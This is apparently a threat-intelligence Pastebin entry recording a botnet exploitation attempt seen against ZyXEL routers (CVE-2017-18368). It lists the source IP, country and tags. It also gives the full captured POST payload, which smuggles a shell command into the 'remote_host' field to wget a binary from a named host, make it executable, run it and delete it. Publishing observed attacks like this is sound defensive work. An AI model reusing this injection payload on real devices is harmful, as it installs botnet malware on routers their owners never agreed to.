Advertisement
internetweather

Botnet C2 89.35.39.74

Nov 1st, 2019
776
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.42 KB | None | 0 0
  1. Source IP: 178.221.82.66
  2. Reverse DNS: 178-221-82-66.dynamic.isp.telekom.rs
  3. Country: Serbia
  4. Payload: POST /cgi-bin/ViewLog.asp HTTP/1.1
  5. POST Data: " remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=;cd /tmp;wget http://89.35.39.74/arm7;chmod 777 arm7;./arm7 zyxel;rm -rf arm7;#&r"
  6. Target Port: 80
  7. Bad Packets® Tags: ZyXEL RCE | Router | CVE-2017-18368
  8. Date Last Seen: 2019-11-01T04:02:44Z
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement